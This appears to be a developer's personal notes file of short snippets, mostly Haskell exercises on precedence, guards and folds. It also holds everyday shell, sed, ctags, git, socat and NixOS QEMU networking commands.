fx [2,4,1,5,3] = 2+4-1+5-3 | |
fx [] = 0 | |
f0 was my initial incorrect attempt | |
f1, f2 and f3 behave correctly -} | |
f0 (x:xs) = foldl (\a b -> (a + b) * t a) x xs | |
where | |
t n | n > 0 = -1 | otherwise = 1 | |
f3 (x:xs) = add x xs | |
where | |
add v [] = v | |
add v (x:xs) = sub (v + x) xs | |
sub v [] = v | |
sub v (x:xs) = add (v - x) xs | |
f3 [] = 0 | |
f1 (x:xs) = sum $ x:zipWith (*) (cycle [1,-1]) xs | |
f1 [] = 0 | |
f2 (x:xs) = sum $ x:zipWith (\a b -> | |
case a `mod` 2 of | |
0 -> b | |
otherwise -> -b | |
) [0..] xs | |
f2 [] = 0 | |
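-- illustrative check (added): f1 [2,4,1,5,3] == f2 [2,4,1,5,3] == f3 [2,4,1,5,3] == 7 | |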
--------------------------------- | |
[Windows ldap] | |
nslookup -type=all _ldap._tcp | |
--------------------------------- | |
[qv instead of hexedit] | |
qv is a function | |
qv () | |
{ | |
[ $# -eq 0 ] && return 1; | |
local F=$1; | |
od -w32 --endian=big -t x1z $F | |
} | |
--------------------------------- | |
[iconv or dos2unix] | |
iconv -f UTF-16LE -t UTF-8 resource.h > _resource.h | |
--------------------------------- | |
[od instead of hexedit] | |
od -w32 --endian=big -t x1z Resource.h | |
--------------------------------- | |
[configuration.nix] | |
boot.kernel.sysctl."vm.max_map_count" = 262144; | |
--------------------------------- | |
[haskell nayana] | |
import Data.Maybe | |
data Op = Add | Sub | Mul | Div | |
| And | Or | Not | Eq | |
| Less | Great | |
deriving (Eq, Show) | |
data Exp = Literal Value | |
| Primitive Op [Exp] | |
| Variable String | |
| If Exp Exp Exp | |
| Let [(String, Exp)] Exp | |
deriving (Show, Eq) | |
data Value = Number Int | |
| Bool Bool | |
| Fractional Float | |
| String String | |
deriving (Eq, Show) | |
type Env = [(String, Value)] | |
eval :: Env -> Exp -> Value | |
eval e (Literal v) = v | |
eval e (Variable x) = fromJust (lookup x e) --22 | |
prim :: Op -> [Value] -> Value | |
prim Add [Number a, Number b] = Number (a + b) | |
prim And [Bool a, Bool b] = Bool (a && b) | |
prim Sub [Number a, Number b] = Number (a - b) | |
prim Mul [Number a, Number b] = Number (a * b) | |
prim Div [Fractional a, Fractional b] = Fractional (a / b) | |
prim Div [Number a, Number b] = Number (a `div` b) | |
prim Or [Bool a, Bool b] = Bool (a || b) | |
prim Not [Bool a] = Bool (not a) | |
prim Eq [Number a, Number b] = Bool (a == b) | |
prim Eq [String a, String b] = Bool (a == b) | |
prim Less [Number a, Number b] = Bool (a < b) | |
prim Less [String a, String b] = Bool (a < b) | |
prim Great [Number a, Number b] = Bool (a > b) | |
prim Great [String a, String b] = Bool (a > b) --37 | |
f :: Exp -> Value | |
f _ = Number 3 | |
main = do | |
--Couldn't match expected type `Exp' with actual type `Value' | |
--eval [("y", (Number 40))] (Let [("x", (Literal (Number 2)))] (prim Add [(Variable "x"), (Variable "y")])) -- orig | |
let x = eval [("y", (Number 40))] (Let [("x", (Literal (Number 2)))] (Literal((prim Add [Number 3, Number 5])))) | |
let m = eval [("y", (Number 40))] (Literal (prim Add [Number 3, Number 4])) | |
let q = eval [("y", (Number 40))] (Literal (Number 2)) | |
let z = Let [("x", Literal (Number 2))] (Literal (Number 2)) | |
let zz = f z | |
putStrLn "hello" | |
--------------------------------- | |
[grep email addrs] | |
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" file.txt | |
--------------------------------- | |
[haskell fib using BangPatterns] | |
{-# LANGUAGE BangPatterns #-} | |
fib :: Int -> Int | |
fib n = go 0 1 0 | |
where | |
go !acc0 acc1 i | |
| i == n = acc0 | |
| otherwise = go acc1 (acc0 + acc1) (i+1) | |
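-- illustrative check (added): fib is 0-indexed here, map fib [0..6] == [0,1,1,2,3,5,8] | |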
--------------------------------- | |
[ycombinator] | |
Y = \f.(\x.f(xx))(\x.f(xx)) | |
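-- Haskell sketch (my addition, not part of the note above): the untyped Y | |
-- does not typecheck directly in Haskell, but the same fixed point is | |
-- available as a recursive let (this is how Data.Function.fix is defined): | |
fix :: (a -> a) -> a | |
fix f = let x = f x in x | |
-- e.g. fix (\rec n -> if n == 0 then 1 else n * rec (n - 1)) 5 == 120 | |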
--------------------------------- | |
[haskell tip] | |
180922 < nitrix> It's associative left-to-right. \x -> \y -> undefined reads as \x -> (\y -> undefined) | |
--------------------------------- | |
[sed print selected lines by deleting the unwanted ones] | |
sed '99q;1,9d;12,99d' /tmp/klines | |
--------------------------------- | |
[sed selected lines with a quit] | |
sed -n '1p;3{p;q};5p' /tmp/xx | |
--------------------------------- | |
[how to git clone] | |
git clone ssh://git@github.com/truthadjustr/googletest.git mygoogletest | |
--------------------------------- | |
[xmlstarlet use -m always] | |
xml sel -t -m //Item/ExternalId -v "concat(.,',')" Items.xml | |
--------------------------------- | |
[nixos qemu networking] | |
#!/bin/sh | |
# | |
tunctl -u dx -t tap0 | |
ifconfig tap0 192.168.100.1 up | |
# qemu-kvm -hda nixos-disc.img -m 1024 -net nic -net tap,ifname=tap0,script=no | |
# *** Inside the Qemu guest *** | |
# ip addr set 192.168.100.2 dev ens3 | |
# route add default gw 192.168.100.1 | |
# echo 'nameserver 8.8.8.8' >> /etc/resolv.conf | |
echo 1 > /proc/sys/net/ipv4/ip_forward | |
iptables -t nat -A POSTROUTING -o wlp0s3 -j MASQUERADE | |
iptables -I FORWARD 1 -i tap0 -j ACCEPT | |
iptables -I FORWARD 1 -o tap0 -m state --state RELATED,ESTABLISHED -j ACCEPT | |
--------------------------------- | |
[haskell cannot use putStrLn in guard] | |
f 0 = show "value = 69" | |
f n | n > 10 = show $ n * 100 + p | |
| otherwise = show $ "value = " ++ show p | |
where | |
p = n*2 + q n | |
g 0 = 0 | |
g n | n `rem` 2 == 0 = n + 1 | |
g n | n > 10 = g (n-1) | |
g n = 2*n | |
q = (3*) | |
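-- note (added): every branch of f returns a String, so print at the call | |
-- site instead, e.g. putStrLn (f 3) | |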
--------------------------------- | |
[haskell statement order matters] | |
f 0 = putStrLn $ "value = 69" | |
f n = | |
putStrLn $ "value = " ++ show p | |
where | |
p = n*2 | |
g 0 = 0 | |
g n | n `rem` 2 == 0 = n + 1 | |
g n | n > 10 = g (n-1) | |
g n = 2*n | |
--------------------------------- | |
[haskell mendero] | |
{--------------- tip on precedence -------------- | |
Here the (++) binds more tightly than ($), so it | |
tries to concatenate the string on its left with | |
the bare function `show` on its right, causing a | |
type error: | |
"sum = " ++ show $ a + b | |
i.e. it parses as ("sum = " ++ show) $ (a + b). | |
Parenthesising the call resolves the result of | |
show (a + b) first, so this works: | |
"sum = " ++ show (a + b) | |
------------------------------------------------} | |
f a b = do | |
let s = a + b | |
let msg = concat.fn.words $ "the sum is " ++ show (a + b) | |
putStrLn msg | |
where | |
fn = map (++"_") | |
--------------------------------- | |
[haskell lite2] | |
-- only f0, f5, f7, f8 works | |
f0 = putStr.concat.map(++"\n") | |
f5 = putStr $ concat$map(++"\n") | |
f7 = concat $ map(++"\n") | |
f8 = putStr.concat $ map(++"\n") | |
f1 = putStr concat.map(++"\n") | |
f2 = putStr $ concat.map(++"\n") | |
f3 = (putStr) concat.map(++"\n") | |
f4 = putStr (concat.map(++"\n")) | |
f6 = concat.map(++"\n") | |
--------------------------------- | |
[haskell lite] | |
a=5 | |
--putStrLn "a" | |
b=a+1 | |
c="world" | |
n=69 | |
fn0 x y= | |
if x `rem` 2 == 0 then | |
"EVEN" ++ c | |
else if x == 5 then | |
case y of | |
"aaa" -> "AAA" ++ show x | |
"bbb" -> y ++ show (x - 1) | |
--otherwise -> y ++ show $ x + 1 | |
otherwise -> y ++ show (x + 1) | |
else | |
"odd" ++ q | |
where | |
q="LITE" | |
fn2 x y = | |
case (x > 0 && y < 10) of | |
True -> "none" | |
otherwise -> "many" | |
fn3 x y = | |
case (x < y || x `rem` 2 == 0) of | |
True -> "aaaaaaaaa" ++ p | |
False -> "bbbbbbb" | |
where | |
p="0123" | |
fn x | |
| x `rem` 2 == 0 = "EVEN" ++ show n ++ q | |
| otherwise = "odd" ++ fn3 x 2 | |
where | |
q = "abc" | |
main :: IO () | |
main = do | |
let d=c | |
let e="hello" | |
let f=d ++ e | |
let x=fn 5 | |
let c=fn 7 | |
putStrLn $ fn 5 | |
putStrLn "testing" | |
putStrLn $ "testing" ++ c ++ fn 2 | |
putStrLn ("testing" ++ c ++ "***\n") | |
putStrLn f | |
putStrLn e | |
putStrLn d | |
let z=fn 5 -- this cannot be the last line | |
putStr "\nBYE\n" | |
--------------------------------- | |
[haskell cbc] | |
f x = x * 2 | |
-- function application precedence > + operator | |
-- = 5 | |
n = f 3 * 2 | |
-- function application vs function application | |
-- same precedence. We go to associativity | |
-- which is left to right. The below does | |
-- not compile | |
-- p = f f 3 | |
-- below does not work coz $ < == | |
-- 3 == f $ 2 | |
data Color = White | Black | |
deriving Eq | |
c1 = White | |
c2 = Black | |
-- Eq only allows ==, /= comparison | |
flag0 = c1 /= c2 -- <,>,<=,>= needs to derive from Ord | |
-- Ord needs Eq (makes sense due to <= comparison) | |
data Piece = Pawn | Knight | Queen | King | |
deriving (Ord,Eq) | |
e2 = Pawn | |
e3 = Knight | |
e4 = Pawn | |
bCheck1 = e2 < e3 | |
bCheck2 = e2 <= e3 | |
fn :: Int -> Int | |
fn x = x + 1 | |
flag = (f.f.f $ 3) == (f $ f $ f $ 3) | |
flag2 = (f.f.f) 3 == (f $ f $ f $ 3) | |
flag3 = 3 == 1 + f 1 | |
--flag4 = 3 == (1 + f $ 1) | |
k f = f.f.f | |
g fn n = fn n | |
x = g g f 3 -- g (g f) 3 | |
y = g k f 3 -- g (k f) 3 | |
-- this proves associativity is | |
-- left to right | |
-- m = 40 | |
-- Else if `f 5` is computed first, | |
-- then an integer value 10 becomes | |
-- input to k. But k accepts a function | |
m = k f 5 | |
-- this does not work bcoz '1+f' comes | |
-- first, which is an error. | |
-- 1 + f $ 2 | |
--------------------------------- | |
[tf diff in cygwin] | |
tf_diff () { | |
[ $# -ne 2 ] && return | |
local TLINES=$(tput lines) | |
local ARTIFACT=$1 | |
local CHANGESET=$2 | |
local PREVIOUS=$(tf history . /recursive | sed -n "/$CHANGESET/{n;p;}" | cut -d' ' -f1) | |
local TMPFILE=$(mktemp --suffix=.diff) | |
rm -f $TMPFILE | |
tf diff $ARTIFACT /version:$PREVIOUS~$CHANGESET > $TMPFILE; | |
if [ $(wc -l < $TMPFILE) -gt $TLINES ]; then | |
vim $TMPFILE | |
else | |
cat $TMPFILE | |
fi | |
rm -f $TMPFILE | |
} | |
--------------------------------- | |
[modaf haskell] | |
f0 a b = | |
let m = 5 in | |
if a < b then do | |
let q = a + b + c | |
(b - a)/c + q | |
else | |
(a + b)/c + m | |
where | |
c = 2 | |
-- function application has higher precedence than + | |
g = f0 3 5 + 1 | |
f1 a b | |
| a < b = (b-a)/c | |
| otherwise = (a+b)/c | |
where | |
c = 2 | |
f2 a b = | |
let e = d + 2 | |
-- won't go into infinite loop | |
-- coz its lazy | |
f = g + 1 | |
g = f + 1 | |
d = 7 - c in | |
case (a + b) of | |
10 -> (b-a)/c + e | |
otherwise -> (a+b)/c + d | |
where | |
-- c = 2 + d -- cannot see d | |
c = 2 | |
f3 a b = | |
case a `mod` 2 == 0 of | |
True -> do | |
if a < b then | |
fromIntegral (b - a) / c | |
else | |
fromIntegral (a + b) / c | |
where | |
c | a `mod` 3 == 0 = 1 | |
| otherwise = 3 | |
otherwise -> 1 | |
--------------------------------- | |
[cygwin bash function to show dependency (aka cli-based depends.exe)] | |
dlldepends is a function | |
dlldepends () | |
{ | |
[ $# -eq 0 ] && return 1; | |
[ ! -r $1 ] && return 2; | |
dumpbin /dependents $1 | sed -n '/Image/,/Summary/p' | dos2unix | sed '/^$/d;1d;$d;s/ //g' | grep -v -E 'KERNEL32|USER32|ADVAPI32|MSVC' | |
} | |
--------------------------------- | |
[bash multiprocessing via subshells] | |
#!/bin/bash | |
# | |
( | |
for((i=0;i < 5;i++));do | |
echo "." | |
sleep 5 | |
done | |
)& | |
echo "********************" | |
for((i=0;i < 5;i++));do | |
echo "*" | |
sleep 1 | |
done | |
wait | |
--------------------------------- | |
[find new files] | |
find . -newermt '3 minute ago' | |
--------------------------------- | |
[haskell concatmap] | |
(.:) :: (c -> d) -> (a -> b -> c) -> a -> b -> d | |
(.:) = (.)(.)(.) | |
concatmap = concat .: map | |
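-- quick check (illustrative only, assumes the definitions above are in scope): | |
-- concatmap (replicate 2) "ab" == "aabb" | |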
--------------------------------- | |
[how not to do a unit test] | |
#include <iostream> | |
#include <limits.h> | |
#include <gtest/gtest.h> | |
int g = 50; | |
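// anti-pattern on display (comment added): all three TESTs read and write | |
// this shared global, so whether the assertions pass depends on the order | |
// in which the tests happen to run. | |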
TEST(Test1,Testing2) { | |
g++; | |
} | |
TEST(Test1,Testing) { | |
int sum = 0; | |
int n = 5000 + g; | |
for (int i = 0;i <= 100;i++) { | |
sum += i; | |
} | |
g--; | |
ASSERT_EQ(sum,n); | |
} | |
TEST(Test1,Testing3) { | |
int sum = 0; | |
int n = 5000 + g; | |
for (int i = 0;i <= 100;i++) { | |
sum += i; | |
} | |
ASSERT_EQ(sum,n); | |
} | |
GTEST_API_ int main(int argc, char **argv) | |
{ | |
printf("Running main() from %s\n", __FILE__); | |
testing::InitGoogleTest(&argc, argv); | |
return RUN_ALL_TESTS(); | |
} | |
--------------------------------- | |
[quicky rsyslog server] | |
socat - udp4-listen:5140,reuseaddr,fork | |
--------------------------------- | |
[haskell tip] | |
19:04 < Tops2> Any operator has a lower precedence than a usual function. That means f x + g x must | |
be (f x) + (g x), because + is an operator. | |
18:59 < Tops2> a statement f g x will have implicit brackets (f g) x as function application is left | |
associative. Though this rule is only used to solve ambigious bracketing after looking | |
at operators and their precedence | |
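-- tiny sketch of both rules (my example, not from the quote): | |
-- with f = (+1) and g = (*2), | |
-- f 3 + g 3 parses as (f 3) + (g 3) == 10 | |
-- f g 3 parses as (f g) 3, which is a type error for these f and g | |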
--------------------------------- | |
[haskell fn associativity] | |
Prelude> f fn = fn | |
Prelude> g = (2*) | |
Prelude> f g 3 | |
6 | |
Prelude> | |
--------------------------------- | |
[haskell precedence $ versus .] | |
d = (2*) | |
d.d$2 | |
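-- illustrative (added): (.) binds tighter than ($), so d.d$2 is (d . d) $ 2 == 8, | |
-- whereas d . d 2 would compose d with the value (d 2) and not typecheck | |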
--------------------------------- | |
[haskell $ versus .] | |
(d . d) 2 = (\x -> d $ d x) 2 = d $ d 2 | |
--------------------------------- | |
[composing map of different fn] | |
(map (2*).map length) [[1,3],[2,0],[1..5]] | |
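-- illustrative (added): the result is [4,4,10]; note map f . map g == map (f . g) | |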
--------------------------------- | |
[awk glory] | |
awk '$0 ~ /^class/{split($0,a,"=");d[a[2]]++} END{for (k in d){if (d[k] > 11) print k;}}' output.log | |
--------------------------------- | |
[python group by 3] | |
with open("/tmp/p") as f: | |
idx = 0 | |
q = [] | |
for line in f: | |
#print(line,end='') | |
a = line.rstrip('\n') | |
q.append(a) | |
idx = idx + 1 | |
if idx % 3 == 0: | |
print(q) | |
q.clear() | |
print(q) | |
--------------------------------- | |
[haskell guarded equation] | |
f x | x < 10 = "less than 10" | |
| otherwise = "greater than 10" | |
--------------------------------- | |
[abbreviate haskell] | |
module Acronym (abbreviate) where | |
import Data.Char (isAlpha,isUpper,toUpper) | |
abbreviate :: String -> String | |
abbreviate = concatMap initials.words.map replaceNonAlpha | |
initials :: String -> String | |
initials [] = [] | |
initials (x:xs) = toUpper x:rest | |
where | |
rest = | |
if not $ isAcronym xs | |
then filter isUpper xs | |
else [] | |
isAcronym :: String -> Bool | |
isAcronym = all isUpper | |
replaceNonAlpha :: Char -> Char | |
replaceNonAlpha x | |
| isAlpha x = x | |
| otherwise = ' ' | |
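-- illustrative (added): | |
-- abbreviate "HyperText Markup Language" == "HTML" | |
-- abbreviate "GNU Image Manipulation Program" == "GIMP" | |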
--------------------------------- | |
[haskell guards are sequenced] | |
divides d n = n `rem` d == 0 | |
ldf k n | |
| divides k n = k | |
| k^2 > n = n | |
| otherwise = ldf (k+1) n | |
ldf2 k n | |
| k^2 > n = n | |
| k == 4 = -1 | |
| divides k n = k | |
| otherwise = ldf2 (k+1) n | |
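-- illustrative (added): guards are tried top to bottom, so reordering them | |
-- changes the result, e.g. ldf 2 25 == 5 but ldf2 2 25 == -1 | |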
--------------------------------- | |
[ctags .vimrc] | |
:set tags=./tags;~/Projects | |
--------------------------------- | |
[ctags with exclude] | |
ctags -R --exclude=".git" -L src.listing | |
--------------------------------- | |
[socat copy file] | |
#Server sending file: | |
server$ socat -u FILE:test.dat TCP-LISTEN:9876,reuseaddr | |
client$ socat -u TCP:127.0.0.1:9876 OPEN:out.dat,creat | |
#Server receiving file: | |
server$ socat -u TCP-LISTEN:9876,reuseaddr OPEN:out.txt,creat && cat out.txt | |
client$ socat -u FILE:test.txt TCP:127.0.0.1:9876 | |
--------------------------------- | |
[git log] | |
git log --pretty=format:"%h%x09%ad%x09%x09%s" | |
--------------------------------- | |
[how to create tags] | |
find . -type f \( -name '*.cpp' -o -name '*.h' \) > src.list; ctags -R -L src.list | |
--------------------------------- | |
[ctags generate tags file from list of files/headers via find] | |
ctags -R -L src.listing | |
--------------------------------- | |
[windows dll cli dependency walker] | |
dlldepends is a function | |
dlldepends () | |
{ | |
[ $# -eq 0 ] && return 1; | |
[ ! -r $1 ] && return 2; | |
dumpbin /dependents $1 | sed -n '/Image/,/Summary/p' | dos2unix | sed '/^$/d;1d;$d;s/ //g' | |
} | |
--------------------------------- | |
[sed delete first and last lines] | |
sed '1d;$d' | |
--------------------------------- | |
[sed print between two patterns] | |
sed -n '/Image/,/Summary/p' | |
--------------------------------- | |
[sed delete if line contains] | |
sed -i '/.*Microsoft.Cpp.*/d' file.vcxproj | |
--------------------------------- | |
[grep a .dll suffix] | |
grep '\.dll' /tmp/fff | |
--------------------------------- | |
[remSeqDups.c] | |
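/* comment added: removes consecutive duplicates in place, | |
   e.g. {1,1,2,2,3}, n=5 becomes {1,2,3}, n=3 */ | |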
void remSeqDups(int a[],int *n) | |
{ | |
int prev,j = 0; | |
for (int i = 0;i < *n;i++) { | |
if (i > 0) { | |
if (prev != a[i]) { | |
a[j] = a[i]; | |
j++; | |
prev = a[i]; | |
} | |
} else { | |
prev = a[i]; | |
j++; | |
} | |
} | |
*n = j; | |
} | |
--------------------------------- | |
[remSeqDups] | |
f a b = return (a+b) | |
remSeqDups [] = [] | |
remSeqDups [a] = [a] | |
remSeqDups (x:y:xs) | |
| x < y = x:remSeqDups (y:xs) | |
| otherwise = remSeqDups (y:xs) | |
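-- illustrative (added): remSeqDups [1,1,2,2,3] == [1,2,3] | |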
--------------------------------- | |
[.vimrc for vim split navigation] | |
nnoremap <C-J> <C-W><C-J> | |
nnoremap <C-K> <C-W><C-K> | |
nnoremap <C-L> <C-W><C-L> | |
nnoremap <C-H> <C-W><C-H> | |
--------------------------------- | |
[correct git syntax] | |
git remote set-url origin git@github.com:truthadjustr/googletest.git | |
--------------------------------- | |
[hs guarded var initialization] | |
fn x = do | |
let a = 3 + p | |
let b = 5 - a | |
a + b + x + fn2 p + fn3 p + a + fn4 b | |
where | |
c | x < 0 = 5 | |
| otherwise = 8 | |
d = case x of | |
0 -> 4 | |
otherwise -> 5 | |
fn2 x = x^2 + p | |
fn3 x | |
| x < 0 = 5 | |
| x < -1 = 6 | |
| x >= 0 = 9 | |
| otherwise = 666 | |
fn4 q = | |
case x of | |
0 -> 3 + p | |
otherwise -> 2 + q | |
p = 5 | |
--------------------------------- |